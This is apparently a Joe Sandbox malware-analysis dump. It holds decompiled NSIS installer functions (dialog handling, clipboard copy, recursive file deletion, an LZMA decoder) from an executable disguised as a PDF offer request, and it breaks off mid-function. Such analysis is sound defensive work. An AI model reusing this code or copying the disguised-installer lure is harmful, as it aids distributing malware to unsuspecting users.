Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe"$.tmp$1033$C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane$C:\Users\user\AppData\Local\Folkedansens\Suffigere\Glaucophane$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 2488574733-2447060325
Opcode ID: 290ea68bc16bf9ba0967596cf016d677efff9e7d5fa8e06392f64e50e51ce68c
Instruction ID: 1c098c9ac5d33f9e9f606ea88917c77842503da0397251e5f420d8b791505771
Opcode Fuzzy Hash: 290ea68bc16bf9ba0967596cf016d677efff9e7d5fa8e06392f64e50e51ce68c
Instruction Fuzzy Hash: 92D107B1200301ABD7207F659D49A3B3AACEB80709F51443FF881B62D1DB7D8952CB6E

Uniqueness

Uniqueness Score: -1.00%

Function 004054B0 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E004054B0(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429224;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E00405444, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						CloseHandle(_t127); // executed
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E00406234(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423728;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42920c == _t156) {
							ShowWindow( *0x42a248, 8);
							if( *0x42a2cc == _t156) {
								_t119 =  *0x422700; // 0x79c00c
								E00405371( *((intOrPtr*)(_t119 + 0x34)), _t156);
							}
							E004042AF(_t171);
							goto L25;
						}
						 *0x421ef8 = 2;
						E004042AF(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040433D(_a8, _a12, _a16);
						}
						ShowWindow( *0x429210, _t156);
						ShowWindow(_t169, 8);
						E0040430B(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a250;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429210 = GetDlgItem(_a4, 0x403);
				 *0x429208 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429224 = _t134;
				_v8 = _t134;
				E0040430B( *0x429210);
				 *0x429214 = E00404C0E(4);
				 *0x42922c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004042D6(_a4);
				if(( *0x42a258 & 0x00000003) != 0) {
					ShowWindow( *0x429210, _t156); // executed
					if(( *0x42a258 & 0x00000002) != 0) {
						 *0x429210 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E0040430B( *0x429208);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a258 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x004054b8
0x004054be
0x004054c8
0x004054cb
0x00405661
0x0040567e
0x00405685
0x00405685
0x00405698
0x004056b6
0x004056b8
0x004056c0
0x00405716
0x0040571a
0x00000000
0x00000000
0x0040571c
0x00405722
0x00000000
0x00000000
0x0040572c
0x00405734
0x00405737
0x00405839
0x00000000
0x00405839
0x00405746
0x00405751
0x0040575a
0x00405765
0x00405768
0x00405771
0x00405777
0x0040577a
0x0040577a
0x00405792
0x0040579b
0x0040579e
0x004057a5
0x004057ac
0x004057b4
0x004057b4
0x004057cb
0x004057cb
0x004057d2
0x004057d8
0x004057e4
0x004057eb
0x004057f4
0x004057f6
0x004057f9
0x00405808
0x0040580b
0x00405811
0x00405812
0x00405818
0x00405819
0x0040581a
0x00405822
0x0040582d
0x00405833
0x00405833
0x00000000
0x00405792
0x004056c8
0x004056f8
0x00405700
0x00405702
0x0040570b
0x0040570b
0x00405711
0x00000000
0x00405711
0x004056cc
0x004056d6
0x00000000
0x0040569a
0x004056a0
0x004056db
0x00000000
0x004056e4
0x004056a9
0x004056ae
0x004056b1
0x00000000
0x004056b1
0x00405698
0x004054d1
0x004054d5
0x004054dd
0x004054e1
0x004054e4
0x004054e7
0x004054ea
0x004054ed
0x004054ee
0x004054ef
0x00405508
0x0040550b
0x00405515
0x00405524
0x0040552c
0x00405534
0x00405539
0x0040553c
0x00405548
0x00405551
0x0040555a
0x0040557c
0x00405582
0x00405593
0x00405598
0x004055a6
0x004055b4
0x004055b4
0x004055b9
0x004055c7
0x004055c7
0x004055cc
0x004055cf
0x004055d4
0x004055e0
0x004055e9
0x004055f6
0x00405605
0x004055f8
0x004055fd
0x004055fd
0x00405611
0x00405611
0x00405625
0x0040562e
0x00405637
0x00405647
0x00405653
0x00405653
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 0040550E
GetDlgItem.USER32(?,000003EE), ref: 0040551D
GetClientRect.USER32(?,?), ref: 0040555A
GetSystemMetrics.USER32(00000002), ref: 00405561
SendMessageW.USER32(?,00001061,00000000,?), ref: 00405582
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405593
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004055A6
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004055B4
SendMessageW.USER32(?,00001024,00000000,?), ref: 004055C7
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004055E9
ShowWindow.USER32(?,00000008), ref: 004055FD
GetDlgItem.USER32(?,000003EC), ref: 0040561E
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040562E
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405647
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405653
GetDlgItem.USER32(?,000003F8), ref: 0040552C

Part of subcall function 0040430B: SendMessageW.USER32(00000028,?,00000001,00404137), ref: 00404319

GetDlgItem.USER32(?,000003EC), ref: 00405670
CreateThread.KERNEL32(00000000,00000000,Function_00005444,00000000), ref: 0040567E
CloseHandle.KERNELBASE(00000000), ref: 00405685
ShowWindow.USER32(00000000), ref: 004056A9
ShowWindow.USER32(?,00000008), ref: 004056AE
ShowWindow.USER32(00000008), ref: 004056F8
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040572C
CreatePopupMenu.USER32 ref: 0040573D
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405751
GetWindowRect.USER32(?,?), ref: 00405771
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578A
SendMessageW.USER32(?,00001073,00000000,?), ref: 004057C2
OpenClipboard.USER32(00000000), ref: 004057D2
EmptyClipboard.USER32 ref: 004057D8
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004057E4
GlobalLock.KERNEL32(00000000), ref: 004057EE
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405802
GlobalUnlock.KERNEL32(00000000), ref: 00405822
SetClipboardData.USER32(0000000D,00000000), ref: 0040582D
CloseClipboard.USER32 ref: 00405833

Strings

{, xrefs: 00405716
(7B, xrefs: 0040579E

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: (7B${
API String ID: 590372296-525222780
Opcode ID: 972fd15b03a93e7331ef4c8797c1849d59520224656438122eee1199d8052db9
Instruction ID: 42ee76c5c0789c909e5484b793d5ed8b68dab9236198efc003755603ec60545b
Opcode Fuzzy Hash: 972fd15b03a93e7331ef4c8797c1849d59520224656438122eee1199d8052db9
Instruction Fuzzy Hash: A4B16971900608FFDB119FA0DD89AAE7B79FB08354F00847AFA45B61A0CB754E51DF68

Uniqueness

Uniqueness Score: -1.00%

Function 00405A03 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405A03(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405CCE(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2c8 =  *0x42a2c8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406212(0x425730, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405C12(_t68);
					} else {
						lstrcatW(0x425730, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x425730,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406212(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E004059BB(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E00405371(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2c8 =  *0x42a2c8 + 1;
										} else {
											E00405371(0xfffffff1, _t68);
											E004060B3(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405A03(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x425730 - 0x5c;
					if( *0x425730 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E00406555(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405BC6(_t68);
							_t38 = E004059BB(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E00405371(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E00405371(0xfffffff1, _t68);
							return E004060B3(_t67, _t68, 0);
						}
						L30:
						 *0x42a2c8 =  *0x42a2c8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405a0d
0x00405a12
0x00405a1b
0x00405a1e
0x00405a26
0x00405a29
0x00405a2c
0x00405a34
0x00405a36
0x00405a37
0x00000000
0x00405a37
0x00405a42
0x00405a45
0x00405a45
0x00405a45
0x00405a49
0x00405a5c
0x00405a63
0x00405a68
0x00405a6c
0x00405a7c
0x00405a6e
0x00405a74
0x00405a74
0x00405a81
0x00405a85
0x00405a91
0x00405a97
0x00405a9c
0x00405aa2
0x00405aad
0x00405ab3
0x00405ab5
0x00405ab8
0x00405b62
0x00405b62
0x00405b66
0x00405b68
0x00405b68
0x00405b68
0x00405b68
0x00000000
0x00000000
0x00000000
0x00000000
0x00405abe
0x00405abe
0x00405abe
0x00405ac6
0x00405ae6
0x00405aee
0x00405af3
0x00405afa
0x00405b15
0x00405b1a
0x00405b1c
0x00405b40
0x00405b1e
0x00405b1e
0x00405b21
0x00405b35
0x00405b23
0x00405b26
0x00405b2e
0x00405b2e
0x00405b21
0x00405afc
0x00405b02
0x00405b04
0x00405b0a
0x00405b0a
0x00405b04
0x00000000
0x00405afa
0x00405ac8
0x00405ad0
0x00000000
0x00000000
0x00405ad2
0x00405ada
0x00000000
0x00000000
0x00405adc
0x00405ae4
0x00000000
0x00000000
0x00000000
0x00405b45
0x00405b4d
0x00405b53
0x00405b53
0x00405b5c
0x00000000
0x00405b5c
0x00405a87
0x00405a8f
0x00000000
0x00000000
0x00000000
0x00405a4b
0x00405a4b
0x00405a4d
0x00405b6d
0x00405b6f
0x00405b72
0x00405bc3
0x00405bc3
0x00405bc3
0x00405b74
0x00405b77
0x00405b82
0x00405b87
0x00405b89
0x00000000
0x00000000
0x00405b8c
0x00405b98
0x00405b9d
0x00405b9f
0x00000000
0x00405bba
0x00405ba1
0x00405ba4
0x00000000
0x00000000
0x00405ba9
0x00000000
0x00405bb0
0x00405b79
0x00405b79
0x00000000
0x00405b79
0x00405a53
0x00405a56
0x00000000
0x00000000
0x00000000
0x00405a56

APIs

DeleteFileW.KERNELBASE(?,?,74E03420,74E02EE0,00000000), ref: 00405A2C
lstrcatW.KERNEL32(00425730,\*.*), ref: 00405A74
lstrcatW.KERNEL32(?,0040A014), ref: 00405A97
lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,74E03420,74E02EE0,00000000), ref: 00405A9D
FindFirstFileW.KERNELBASE(00425730,?,?,?,0040A014,?,00425730,?,?,74E03420,74E02EE0,00000000), ref: 00405AAD
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B4D
FindClose.KERNEL32(00000000), ref: 00405B5C

Strings

0WB, xrefs: 00405A5C
\*.*, xrefs: 00405A6E
"C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe", xrefs: 00405A03

Memory Dump Source

Source File: 00000002.00000002.54384121876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.54384076005.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384210007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384265067.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384498860.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384553324.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384607048.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384648016.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384707130.0000000000467000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.54384736807.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_REQUEST FOR OFFER 30-12-2022#U00b7pdf.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\REQUEST FOR OFFER 30-12-2022#U00b7pdf.exe"$0WB$\*.*
API String ID: 2035342205-4219486056
Opcode ID: bf521971237f06a6bfd3a8137c3f0154ea7fee40ee360af2ff33bb12ffbce5a4
Instruction ID: 3abc1f52a39f62d65ddaa07d2a5323def7e4f5b1e1581b0ba6d8596f0725500f
Opcode Fuzzy Hash: bf521971237f06a6bfd3a8137c3f0154ea7fee40ee360af2ff33bb12ffbce5a4
Instruction Fuzzy Hash: FA41CE30901A18AADB31AB668C89ABF7678EF41714F10427BF801711D1D7BC69829E6E

Uniqueness

Uniqueness Score: -1.00%

Function 004068DA Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E004068DA() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
